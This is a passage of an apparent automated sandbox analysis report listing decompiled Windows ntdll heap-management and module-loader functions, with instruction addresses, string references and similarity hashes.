                                                                                        0x00bfad75
                                                                                        0x00bfad78
                                                                                        0x00c39ff6
                                                                                        0x00c39ffc
                                                                                        0x00c3a003
                                                                                        0x00c3a00e
                                                                                        0x00c3a010
                                                                                        0x00c3a01b
                                                                                        0x00c3a01b
                                                                                        0x00c3a01b
                                                                                        0x00c3a038
                                                                                        0x00c3a038
                                                                                        0x00c3a003
                                                                                        0x00bfad84
                                                                                        0x00bfad89
                                                                                        0x00bfad8c
                                                                                        0x00bfad8e
                                                                                        0x00c3a042
                                                                                        0x00c3a045
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c3a054
                                                                                        0x00000000
                                                                                        0x00bfad94
                                                                                        0x00bfad94
                                                                                        0x00bfad94
                                                                                        0x00bfad96
                                                                                        0x00bfad96
                                                                                        0x00bfad99
                                                                                        0x00c3a063
                                                                                        0x00c3a065
                                                                                        0x00c3a070
                                                                                        0x00c3a070
                                                                                        0x00c3a070
                                                                                        0x00c3a08d
                                                                                        0x00c3a08d
                                                                                        0x00bfada4
                                                                                        0x00bfada6
                                                                                        0x00000000
                                                                                        0x00bfada6
                                                                                        0x00bfad8e
                                                                                        0x00bfad6d
                                                                                        0x00bfad3c
                                                                                        0x00bfad3c
                                                                                        0x00000000
                                                                                        0x00bfad3c
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bfacd8

                                                                                        Strings
                                                                                        • HEAP: , xrefs: 00C3A0BA
                                                                                        • HEAP[%wZ]: , xrefs: 00C3A0AD
                                                                                        • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 00C3A0CD
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                                                        • API String ID: 0-1340214556
                                                                                        • Opcode ID: 980eb34f33765c266867c5449c0577559b5f4c3fde366c6f5f638bf0574806e0
                                                                                        • Instruction ID: 16c215519fde6c3174d1e29e2a95235c033f769c9ccf4310fc14ea917dd981c1
                                                                                        • Opcode Fuzzy Hash: 980eb34f33765c266867c5449c0577559b5f4c3fde366c6f5f638bf0574806e0
                                                                                        • Instruction Fuzzy Hash: 27810275214688EFD72ACBA8C884FB9BBF8EF04300F1441E5E6568B692D774EE44DB11
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BEB73D, Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 74%
                                                                                        			E00BEB73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t72;
				char _t76;
				signed char _t77;
				intOrPtr* _t80;
				unsigned int _t85;
				signed int* _t86;
				signed int _t88;
				signed char _t89;
				intOrPtr _t90;
				intOrPtr _t101;
				intOrPtr* _t111;
				void* _t117;
				intOrPtr* _t118;
				signed int _t120;
				signed char _t121;
				intOrPtr* _t123;
				signed int _t126;
				intOrPtr _t136;
				signed int _t139;
				void* _t140;
				signed int _t141;
				void* _t147;

				_t111 = _a4;
				_t140 = __ecx;
				_v8 = __edx;
				_t3 = _t111 + 0x18; // 0x0
				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
				_t5 = _t111 - 8; // -32
				_t141 = _t5;
				 *(_t111 + 0x14) = _a8;
				_t72 = 4;
				 *(_t141 + 2) = 1;
				 *_t141 = _t72;
				 *((char*)(_t141 + 7)) = 3;
				_t134 =  *((intOrPtr*)(__edx + 0x18));
				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
					_t76 = (_t141 - __edx >> 0x10) + 1;
					_v12 = _t76;
					__eflags = _t76 - 0xfe;
					if(_t76 >= 0xfe) {
						_push(__edx);
						_push(0);
						E00C8A80D(_t134, 3, _t141, __edx);
						_t76 = _v12;
					}
				} else {
					_t76 = 0;
				}
				 *((char*)(_t141 + 6)) = _t76;
				if( *0xcb8748 >= 1) {
					__eflags = _a12 - _t141;
					if(_a12 <= _t141) {
						goto L4;
					}
					_t101 =  *[fs:0x30];
					__eflags =  *(_t101 + 0xc);
					if( *(_t101 + 0xc) == 0) {
						_push("HEAP: ");
						E00BCB150();
					} else {
						E00BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
					E00BCB150();
					__eflags =  *0xcb7bc8;
					if(__eflags == 0) {
						E00C82073(_t111, 1, _t140, __eflags);
					}
					goto L3;
				} else {
					L3:
					_t147 = _a12 - _t141;
					L4:
					if(_t147 != 0) {
						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
					}
					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
					}
					_t135 =  *(_t111 + 0x14);
					if( *(_t111 + 0x14) == 0) {
						L12:
						_t77 =  *((intOrPtr*)(_t141 + 6));
						if(_t77 != 0) {
							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
						} else {
							_t117 = _t140;
						}
						_t118 = _t117 + 0x38;
						_t26 = _t111 + 8; // -16
						_t80 = _t26;
						_t136 =  *_t118;
						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
							_push(_t118);
							_push(0);
							E00C8A80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
						} else {
							 *_t80 = _t136;
							 *((intOrPtr*)(_t80 + 4)) = _t118;
							 *((intOrPtr*)(_t136 + 4)) = _t80;
							 *_t118 = _t80;
						}
						_t120 = _v8;
						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
							__eflags =  *(_t140 + 0xb8);
							if( *(_t140 + 0xb8) == 0) {
								_t88 =  *(_t140 + 0x40) & 0x00000003;
								__eflags = _t88 - 2;
								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
								__eflags =  *0xcb8720 & 0x00000001;
								_t89 = _t88 & 0xffffff00 | ( *0xcb8720 & 0x00000001) == 0x00000000;
								__eflags = _t89 & _t121;
								if((_t89 & _t121) != 0) {
									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
								}
							}
						}
						_t85 =  *(_t111 + 0x14);
						if(_t85 >= 0x7f000) {
							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
						}
						_t86 = _a16;
						 *_t86 = _t141 - _a12 >> 3;
						return _t86;
					} else {
						_t90 = E00BEB8E4(_t135);
						_t123 =  *((intOrPtr*)(_t90 + 4));
						if( *_t123 != _t90) {
							_push(_t123);
							_push( *_t123);
							E00C8A80D(0, 0xd, _t90, 0);
						} else {
							 *_t111 = _t90;
							 *((intOrPtr*)(_t111 + 4)) = _t123;
							 *_t123 = _t111;
							 *((intOrPtr*)(_t90 + 4)) = _t111;
						}
						_t139 =  *(_t140 + 0xb8);
						if(_t139 != 0) {
							_t93 =  *(_t111 + 0x14) >> 0xc;
							__eflags = _t93;
							while(1) {
								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
									break;
								}
								_t126 =  *_t139;
								__eflags = _t126;
								if(_t126 != 0) {
									_t139 = _t126;
									continue;
								}
								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
								break;
							}
							E00BEE4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
						}
						goto L12;
					}
				}
			}






























                                                                                        0x00beb746
                                                                                        0x00beb74b
                                                                                        0x00beb74d
                                                                                        0x00beb750
                                                                                        0x00beb755
                                                                                        0x00beb758
                                                                                        0x00beb758
                                                                                        0x00beb75e
                                                                                        0x00beb763
                                                                                        0x00beb764
                                                                                        0x00beb76a
                                                                                        0x00beb76d
                                                                                        0x00beb771
                                                                                        0x00beb776
                                                                                        0x00beb85c
                                                                                        0x00beb85d
                                                                                        0x00beb860
                                                                                        0x00beb865
                                                                                        0x00c32ba1
                                                                                        0x00c32ba2
                                                                                        0x00c32ba9
                                                                                        0x00c32bae
                                                                                        0x00c32bae
                                                                                        0x00beb77c
                                                                                        0x00beb77c
                                                                                        0x00beb77c
                                                                                        0x00beb785
                                                                                        0x00beb788
                                                                                        0x00c32bb6
                                                                                        0x00c32bb9
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c32bbf
                                                                                        0x00c32bc5
                                                                                        0x00c32bc9
                                                                                        0x00c32be8
                                                                                        0x00c32bed
                                                                                        0x00c32bcb
                                                                                        0x00c32be0
                                                                                        0x00c32be5
                                                                                        0x00c32bf3
                                                                                        0x00c32bf8
                                                                                        0x00c32bfd
                                                                                        0x00c32c05
                                                                                        0x00c32c0e
                                                                                        0x00c32c0e
                                                                                        0x00000000
                                                                                        0x00beb78e
                                                                                        0x00beb78e
                                                                                        0x00beb78e
                                                                                        0x00beb791
                                                                                        0x00beb791
                                                                                        0x00beb797
                                                                                        0x00beb797
                                                                                        0x00beb79f
                                                                                        0x00beb7a9
                                                                                        0x00beb7af
                                                                                        0x00beb7af
                                                                                        0x00beb7b1
                                                                                        0x00beb7b6
                                                                                        0x00beb7e2
                                                                                        0x00beb7e2
                                                                                        0x00beb7e7
                                                                                        0x00beb880
                                                                                        0x00beb7ed
                                                                                        0x00beb7ed
                                                                                        0x00beb7ed
                                                                                        0x00beb7ef
                                                                                        0x00beb7f2
                                                                                        0x00beb7f2
                                                                                        0x00beb7f5
                                                                                        0x00beb7fa
                                                                                        0x00c32c2d
                                                                                        0x00c32c2e
                                                                                        0x00c32c39
                                                                                        0x00beb800
                                                                                        0x00beb800
                                                                                        0x00beb802
                                                                                        0x00beb805
                                                                                        0x00beb808
                                                                                        0x00beb808
                                                                                        0x00beb80a
                                                                                        0x00beb80d
                                                                                        0x00beb816
                                                                                        0x00beb81c
                                                                                        0x00beb822
                                                                                        0x00beb82f
                                                                                        0x00beb88b
                                                                                        0x00beb892
                                                                                        0x00beb897
                                                                                        0x00beb899
                                                                                        0x00beb89b
                                                                                        0x00beb89e
                                                                                        0x00beb8a5
                                                                                        0x00beb8a8
                                                                                        0x00beb8aa
                                                                                        0x00beb8ac
                                                                                        0x00beb8ac
                                                                                        0x00beb8aa
                                                                                        0x00beb892
                                                                                        0x00beb831
                                                                                        0x00beb839
                                                                                        0x00beb83b
                                                                                        0x00beb83b
                                                                                        0x00beb844
                                                                                        0x00beb84b
                                                                                        0x00beb852
                                                                                        0x00beb7b8
                                                                                        0x00beb7ba
                                                                                        0x00beb7bf
                                                                                        0x00beb7c4
                                                                                        0x00c32c18
                                                                                        0x00c32c19
                                                                                        0x00c32c23
                                                                                        0x00beb7ca
                                                                                        0x00beb7ca
                                                                                        0x00beb7cc
                                                                                        0x00beb7cf
                                                                                        0x00beb7d1
                                                                                        0x00beb7d1
                                                                                        0x00beb7d4
                                                                                        0x00beb7dc
                                                                                        0x00beb8bb
                                                                                        0x00beb8bb
                                                                                        0x00beb8be
                                                                                        0x00beb8be
                                                                                        0x00beb8c1
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00beb8c3
                                                                                        0x00beb8c5
                                                                                        0x00beb8c7
                                                                                        0x00beb8e0
                                                                                        0x00000000
                                                                                        0x00beb8e0
                                                                                        0x00beb8cc
                                                                                        0x00beb8cc
                                                                                        0x00000000
                                                                                        0x00beb8cc
                                                                                        0x00beb8d6
                                                                                        0x00beb8d6
                                                                                        0x00000000
                                                                                        0x00beb7dc
                                                                                        0x00beb7b6

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                        • API String ID: 0-1334570610
                                                                                        • Opcode ID: 9bf9b8f22bf4b1395999b4d99141dd8031fe2fb95332f329c15ff5efb9772e78
                                                                                        • Instruction ID: e45142678ea27fc8807db992eea44b94de0e6c0593261bec3ddf6a02c8b4d398
                                                                                        • Opcode Fuzzy Hash: 9bf9b8f22bf4b1395999b4d99141dd8031fe2fb95332f329c15ff5efb9772e78
                                                                                        • Instruction Fuzzy Hash: 17619B706102819FDB28DF25D485F6ABBE5FF44304F2485AEE84A8B792D730EC81CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00BD7E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 98%
                                                                                        			E00BD7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E00BDCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E00BCC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0xcb5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E00C45510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0xcb5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E00BE7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E00BE7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E00C47016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E00BE7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E00BE7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E00C47016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E00BFA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E00BCB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                                                        0x00bd7e4c
                                                                                        0x00bd7e50
                                                                                        0x00bd7e55
                                                                                        0x00bd7e58
                                                                                        0x00bd7e5d
                                                                                        0x00bd7e71
                                                                                        0x00bd7f33
                                                                                        0x00bd7e77
                                                                                        0x00bd7e77
                                                                                        0x00bd7e79
                                                                                        0x00bd7e79
                                                                                        0x00bd7e7e
                                                                                        0x00bd7f45
                                                                                        0x00c29848
                                                                                        0x00000000
                                                                                        0x00c29848
                                                                                        0x00bd7f4e
                                                                                        0x00bd7f53
                                                                                        0x00bd7f5a
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c2985a
                                                                                        0x00c29862
                                                                                        0x00c29866
                                                                                        0x00000000
                                                                                        0x00c2986c
                                                                                        0x00000000
                                                                                        0x00c2986c
                                                                                        0x00bd7e84
                                                                                        0x00bd7e84
                                                                                        0x00bd7e8d
                                                                                        0x00c29871
                                                                                        0x00bd7eb8
                                                                                        0x00bd7ec0
                                                                                        0x00bd7ec0
                                                                                        0x00bd7e9a
                                                                                        0x00c2987e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c29884
                                                                                        0x00c2988b
                                                                                        0x00c298a7
                                                                                        0x00c298ac
                                                                                        0x00c298b1
                                                                                        0x00c298b6
                                                                                        0x00c298b8
                                                                                        0x00c298b8
                                                                                        0x00c298b9
                                                                                        0x00000000
                                                                                        0x00c298b9
                                                                                        0x00bd7ea0
                                                                                        0x00bd7ea7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bd7eac
                                                                                        0x00bd7eb1
                                                                                        0x00bd7ec6
                                                                                        0x00bd7ed0
                                                                                        0x00c298cc
                                                                                        0x00bd7ed6
                                                                                        0x00bd7ed6
                                                                                        0x00bd7ed6
                                                                                        0x00bd7ede
                                                                                        0x00bd7ee3
                                                                                        0x00c298e3
                                                                                        0x00c298f0
                                                                                        0x00c29902
                                                                                        0x00c298f2
                                                                                        0x00c298fb
                                                                                        0x00c298fb
                                                                                        0x00c29907
                                                                                        0x00c2991d
                                                                                        0x00c2991d
                                                                                        0x00c29907
                                                                                        0x00c298e3
                                                                                        0x00bd7ef0
                                                                                        0x00bd7f14
                                                                                        0x00bd7f14
                                                                                        0x00bd7f1e
                                                                                        0x00c29946
                                                                                        0x00bd7f24
                                                                                        0x00bd7f24
                                                                                        0x00bd7f24
                                                                                        0x00bd7f2c
                                                                                        0x00c2996a
                                                                                        0x00c29975
                                                                                        0x00c29975
                                                                                        0x00c2997e
                                                                                        0x00c29993
                                                                                        0x00c29993
                                                                                        0x00c2997e
                                                                                        0x00000000
                                                                                        0x00bd7ef2
                                                                                        0x00bd7efc
                                                                                        0x00bd7f0a
                                                                                        0x00bd7f0e
                                                                                        0x00c29933
                                                                                        0x00000000
                                                                                        0x00c29933
                                                                                        0x00000000
                                                                                        0x00bd7f0e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00bd7eb1

                                                                                        Strings
                                                                                        • Could not validate the crypto signature for DLL %wZ, xrefs: 00C29891
                                                                                        • LdrpCompleteMapModule, xrefs: 00C29898
                                                                                        • minkernel\ntdll\ldrmap.c, xrefs: 00C298A2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                                                        • API String ID: 0-1676968949
                                                                                        • Opcode ID: 7f509c09a7b8548264d04fc758ddb0bfb8cba60c9d540451b9b6d374ee89b8e9
                                                                                        • Instruction ID: 09711f1c455b5734965773c93fa76d5845a23b96c240dbcf27b735c5cb8b1ad6
                                                                                        • Opcode Fuzzy Hash: 7f509c09a7b8548264d04fc758ddb0bfb8cba60c9d540451b9b6d374ee89b8e9
                                                                                        • Instruction Fuzzy Hash: 995116316487549BDB21CB58D984BAAB7E8FF01310F1406EAE8559B7E1FB70ED00C751
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00C723E3, Relevance: 3.9, Strings: 3, Instructions: 166COMMONCrypto
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 64%
                                                                                        			E00C723E3(signed int __ecx, unsigned int __edx) {
				intOrPtr _v8;
				intOrPtr _t42;
				char _t43;
				signed short _t44;
				signed short _t48;
				signed char _t51;
				signed short _t52;
				intOrPtr _t54;
				signed short _t64;
				signed short _t66;
				intOrPtr _t69;
				signed short _t73;
				signed short _t76;
				signed short _t77;
				signed short _t79;
				void* _t83;
				signed int _t84;
				signed int _t85;
				signed char _t94;
				unsigned int _t99;
				unsigned int _t104;
				signed int _t108;
				void* _t110;
				void* _t111;
				unsigned int _t114;

				_t84 = __ecx;
				_push(__ecx);
				_t114 = __edx;
				_t42 =  *((intOrPtr*)(__edx + 7));
				if(_t42 == 1) {
					L49:
					_t43 = 1;
					L50:
					return _t43;
				}
				if(_t42 != 4) {
					if(_t42 >= 0) {
						if( *(__ecx + 0x4c) == 0) {
							_t44 =  *__edx & 0x0000ffff;
						} else {
							_t73 =  *__edx;
							if(( *(__ecx + 0x4c) & _t73) != 0) {
								_t73 = _t73 ^  *(__ecx + 0x50);
							}
							_t44 = _t73 & 0x0000ffff;
						}
					} else {
						_t104 = __edx >> 0x00000003 ^  *__edx ^  *0xcb874c ^ __ecx;
						if(_t104 == 0) {
							_t76 =  *((intOrPtr*)(__edx - (_t104 >> 0xd)));
						} else {
							_t76 = 0;
						}
						_t44 =  *((intOrPtr*)(_t76 + 0x14));
					}
					_t94 =  *((intOrPtr*)(_t114 + 7));
					_t108 = _t44 & 0xffff;
					if(_t94 != 5) {
						if((_t94 & 0x00000040) == 0) {
							if((_t94 & 0x0000003f) == 0x3f) {
								if(_t94 >= 0) {
									if( *(_t84 + 0x4c) == 0) {
										_t48 =  *_t114 & 0x0000ffff;
									} else {
										_t66 =  *_t114;
										if(( *(_t84 + 0x4c) & _t66) != 0) {
											_t66 = _t66 ^  *(_t84 + 0x50);
										}
										_t48 = _t66 & 0x0000ffff;
									}
								} else {
									_t99 = _t114 >> 0x00000003 ^  *_t114 ^  *0xcb874c ^ _t84;
									if(_t99 == 0) {
										_t69 =  *((intOrPtr*)(_t114 - (_t99 >> 0xd)));
									} else {
										_t69 = 0;
									}
									_t48 =  *((intOrPtr*)(_t69 + 0x14));
								}
								_t85 =  *(_t114 + (_t48 & 0xffff) * 8 - 4);
							} else {
								_t85 = _t94 & 0x3f;
							}
						} else {
							_t85 =  *(_t114 + 4 + (_t94 & 0x3f) * 8) & 0x0000ffff;
						}
					} else {
						_t85 =  *(_t84 + 0x54) & 0x0000ffff ^  *(_t114 + 4) & 0x0000ffff;
					}
					_t110 = (_t108 << 3) - _t85;
				} else {
					if( *(__ecx + 0x4c) == 0) {
						_t77 =  *__edx & 0x0000ffff;
					} else {
						_t79 =  *__edx;
						if(( *(__ecx + 0x4c) & _t79) != 0) {
							_t79 = _t79 ^  *(__ecx + 0x50);
						}
						_t77 = _t79 & 0x0000ffff;
					}
					_t110 =  *((intOrPtr*)(_t114 - 8)) - (_t77 & 0x0000ffff);
				}
				_t51 =  *((intOrPtr*)(_t114 + 7));
				if(_t51 != 5) {
					if((_t51 & 0x00000040) == 0) {
						_t52 = 0;
						goto L42;
					}
					_t64 = _t51 & 0x3f;
					goto L38;
				} else {
					_t64 =  *(_t114 + 6) & 0x000000ff;
					L38:
					_t52 = _t64 << 0x00000003 & 0x0000ffff;
					L42:
					_t35 = _t114 + 8; // -16
					_t111 = _t110 + (_t52 & 0x0000ffff);
					_t83 = _t35 + _t111;
					_t54 = E00C1D4F0(_t83, 0xba6c58, 8);
					_v8 = _t54;
					if(_t54 == 8) {
						goto L49;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E00BCB150();
					} else {
						E00BCB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t111);
					_push(_v8 + _t83);
					E00BCB150("Heap block at %p modified at %p past requested size of %Ix\n", _t114);
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0xcb6378 = 1;
						asm("int3");
						 *0xcb6378 = 0;
					}
					_t43 = 0;
					goto L50;
				}
			}




























                                                                                        0x00c723e3
                                                                                        0x00c723e8
                                                                                        0x00c723eb
                                                                                        0x00c723ee
                                                                                        0x00c723f3
                                                                                        0x00c7259b
                                                                                        0x00c7259b
                                                                                        0x00c7259d
                                                                                        0x00c725a3
                                                                                        0x00c725a3
                                                                                        0x00c723fb
                                                                                        0x00c72424
                                                                                        0x00c7244f
                                                                                        0x00c72460
                                                                                        0x00c72451
                                                                                        0x00c72451
                                                                                        0x00c72456
                                                                                        0x00c72458
                                                                                        0x00c72458
                                                                                        0x00c7245b
                                                                                        0x00c7245b
                                                                                        0x00c72426
                                                                                        0x00c72431
                                                                                        0x00c72436
                                                                                        0x00c72443
                                                                                        0x00c72438
                                                                                        0x00c72438
                                                                                        0x00c72438
                                                                                        0x00c72445
                                                                                        0x00c72445
                                                                                        0x00c72463
                                                                                        0x00c72469
                                                                                        0x00c7246f
                                                                                        0x00c72480
                                                                                        0x00c72495
                                                                                        0x00c724a1
                                                                                        0x00c724ce
                                                                                        0x00c724df
                                                                                        0x00c724d0
                                                                                        0x00c724d0
                                                                                        0x00c724d5
                                                                                        0x00c724d7
                                                                                        0x00c724d7
                                                                                        0x00c724da
                                                                                        0x00c724da
                                                                                        0x00c724a3
                                                                                        0x00c724b0
                                                                                        0x00c724b5
                                                                                        0x00c724c2
                                                                                        0x00c724b7
                                                                                        0x00c724b7
                                                                                        0x00c724b7
                                                                                        0x00c724c4
                                                                                        0x00c724c4
                                                                                        0x00c724e8
                                                                                        0x00c72497
                                                                                        0x00c7249a
                                                                                        0x00c7249a
                                                                                        0x00c72482
                                                                                        0x00c72488
                                                                                        0x00c72488
                                                                                        0x00c72471
                                                                                        0x00c72479
                                                                                        0x00c72479
                                                                                        0x00c724ef
                                                                                        0x00c723fd
                                                                                        0x00c72401
                                                                                        0x00c72412
                                                                                        0x00c72403
                                                                                        0x00c72403
                                                                                        0x00c72408
                                                                                        0x00c7240a
                                                                                        0x00c7240a
                                                                                        0x00c7240d
                                                                                        0x00c7240d
                                                                                        0x00c7241b
                                                                                        0x00c7241b
                                                                                        0x00c724f1
                                                                                        0x00c724f6
                                                                                        0x00c72507
                                                                                        0x00c72510
                                                                                        0x00000000
                                                                                        0x00c72510
                                                                                        0x00c7250b
                                                                                        0x00000000
                                                                                        0x00c724f8
                                                                                        0x00c724f8
                                                                                        0x00c724fc
                                                                                        0x00c72500
                                                                                        0x00c72512
                                                                                        0x00c72515
                                                                                        0x00c7251a
                                                                                        0x00c72521
                                                                                        0x00c72524
                                                                                        0x00c72529
                                                                                        0x00c7252f
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00c7253c
                                                                                        0x00c7255c
                                                                                        0x00c72561
                                                                                        0x00c7253e
                                                                                        0x00c72554
                                                                                        0x00c72559
                                                                                        0x00c7256a
                                                                                        0x00c7256d
                                                                                        0x00c72574
                                                                                        0x00c72586
                                                                                        0x00c72588
                                                                                        0x00c7258f
                                                                                        0x00c72590
                                                                                        0x00c72590
                                                                                        0x00c72597
                                                                                        0x00000000
                                                                                        0x00c72597

                                                                                        Strings
                                                                                        • HEAP: , xrefs: 00C7255C
                                                                                        • HEAP[%wZ]: , xrefs: 00C7254F
                                                                                        • Heap block at %p modified at %p past requested size of %Ix, xrefs: 00C7256F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000002.00000002.258947287.0000000000BA0000.00000040.00000001.sdmp, Offset: 00BA0000, based on PE: true
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                                                                        • API String ID: 0-3815128232
                                                                                        • Opcode ID: be7a79109cb52906bfb93eb5aad2ad766545625ae80bb9ee737b6d3598bb25f4
